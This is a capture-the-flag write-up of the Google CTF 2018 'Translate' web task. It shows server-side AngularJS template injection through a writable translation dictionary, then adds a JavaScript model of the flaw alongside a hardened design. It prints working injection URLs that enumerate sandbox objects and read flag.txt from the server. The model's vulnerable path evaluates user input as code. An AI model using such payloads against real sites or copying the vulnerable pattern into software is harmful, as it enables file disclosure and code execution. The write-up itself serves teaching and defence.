Google CTF 2018 Quals: Translate web task solution
This web application implements a translation service with a dictionary stored in memory.
One can dump the JSON dictionary and add values to it.
Upon observing the dumped dictionary it becomes obvious that the application performs server-side AngularJS rendering on some of the dictionary keys (which are really web-site messages rather than words to translate).
The solution is to overwrite the dictionary value that gets rendered, enumerate the methods accessible inside the AngularJS sandbox, and find a method which allows local file inclusion.
Executing Object.keys():
http://translate.ctfcompetition.com:1337/add?lang=fr&word=in_lang_query_is_spelled&translated={{i18n.constructor.prototype.constructor.keys(i18n)}}
Reading the flag:
http://translate.ctfcompetition.com:1337/add?lang=fr&word=in_lang_query_is_spelled&translated={{this.$parent.$parent.i18n.template(%27flag.txt%27)}}
or simply:
http://translate.ctfcompetition.com:1337/add?lang=fr&word=in_lang_query_is_spelled&translated={{i18n.template(%27flag.txt%27)}}
=>
Result can be accessed on http://translate.ctfcompetition.com:1337/?query=in_lang_query_is_spelled&lang=fr:
CTF{Televersez_vos_exploits_dans_mon_nuagiciel}
One could also just bruteforce or guess the method name ("template").
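The design flaw described above, modelled as an added example (not the challenge's own code): a tiny stand-in for AngularJS interpolation, the task-style single dictionary in which a user-added word can overwrite a message key and is then compiled as a template, and a hardened layout where site messages are fixed code and user translations are bound once as data. The message text, the `interpolate` helper and the key names are assumptions made for the illustration.

```javascript
"use strict";

// Stand-in for AngularJS interpolation: evaluate each {{ expr }} against a scope.
// Constructed for this example; the task itself compiles real AngularJS server-side.
function interpolate(template, scope) {
  return template.replace(/\{\{([\s\S]*?)\}\}/g, (_, expr) => {
    const fn = new Function(...Object.keys(scope), `return (${expr});`);
    return String(fn(...Object.values(scope)));
  });
}

// Vulnerable design, as in the task: one dictionary holds both site messages and
// user-added translations, and whatever is looked up is compiled as a template.
function vulnerableAdd(dict, word, translated) {
  dict[word] = translated; // a user may overwrite a message key such as in_lang_query_is_spelled
}
function vulnerableRender(dict, key, vars) {
  return interpolate(dict[key], { i18n: dict, ...vars }); // user data becomes code
}

// Hardened design: message templates are fixed code in a frozen map, user
// translations live in their own Map, and a translation is bound as data
// ({{ translation }}) exactly once, so its contents are never evaluated.
// (HTML-escape the bound values as well if this string is emitted into HTML.)
const MESSAGES = Object.freeze({
  in_lang_query_is_spelled: "In {{ lang }}, {{ query }} is spelled {{ translation }}",
});
function hardenedAdd(userDict, word, translated) {
  // Restrict keys to a plain identifier shape and store only strings.
  if (!/^[\p{L}\p{N}_-]{1,64}$/u.test(word)) throw new Error("bad word");
  userDict.set(word, String(translated)); // a Map has no prototype or message keys to clobber
}
function hardenedRender(userDict, lang, query) {
  const translation = userDict.has(query) ? userDict.get(query) : "(unknown)";
  // Single interpolation pass: the replacement text is inserted verbatim, not re-scanned.
  return interpolate(MESSAGES.in_lang_query_is_spelled, { lang, query, translation });
}

// Demo with a harmless expression: the vulnerable path evaluates it, the hardened path shows it literally.
function demo() {
  const shared = { in_lang_query_is_spelled: "In {{ lang }}, {{ query }} is spelled {{ i18n[query] }}" };
  vulnerableAdd(shared, "in_lang_query_is_spelled", "{{ 6 * 7 }}");
  const users = new Map();
  hardenedAdd(users, "in_lang_query_is_spelled", "{{ 6 * 7 }}");
  return {
    vulnerable: vulnerableRender(shared, "in_lang_query_is_spelled", { lang: "fr", query: "x" }),
    hardened: hardenedRender(users, "fr", "in_lang_query_is_spelled"),
  };
}
```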